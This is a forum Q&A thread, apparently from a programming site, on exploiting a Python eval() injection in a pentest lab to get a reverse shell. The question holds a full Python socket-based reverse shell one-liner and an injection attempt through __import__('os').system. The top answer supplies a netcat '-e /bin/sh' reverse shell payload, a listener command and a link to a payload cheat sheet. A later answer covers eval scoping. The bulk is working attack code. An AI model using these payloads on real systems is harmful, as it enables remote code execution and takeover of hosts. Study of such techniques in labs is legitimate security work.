# Python - running reverse shell inside eval()

Tags: python, reverse-shell

I am working on a pentest lab. There is a Python eval() function I need to exploit.

It is like

```
eval('%s>1',payload)
```

I need to execute a Python reverse shell script as payload. It is

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

I am trying like

```
eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")
```

Not sure how to import all those modules and execute it.

Any help appreciated.

Answer (score 2):

Maybe try like this

`"__import__('os').system('nc your_ip port -e /bin/sh')"`

like;

First listen port fresh terminal

`nc -lvp 1234`

after try another terminal:

`"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"`

`"__import__('os').system('YOUR REVERSE SHELL METHOD')"`

here's many reverse shell payload : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

good luck

Comment: I need to use Python reverse shell.

Comment: did u check PayloadsAllTheThings ?

Answer (score 0):

Try to include `globals()` and `locals()` in the `eval` (to import into the global scope). This is explained in [In Python, why doesn't an import in an exec in a function work?](https://stackoverflow.com/questions/12505047/in-python-why-doesnt-an-import-in-an-exec-in-a-function-work)

Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/ chapter *Behind the Scenes of Imports*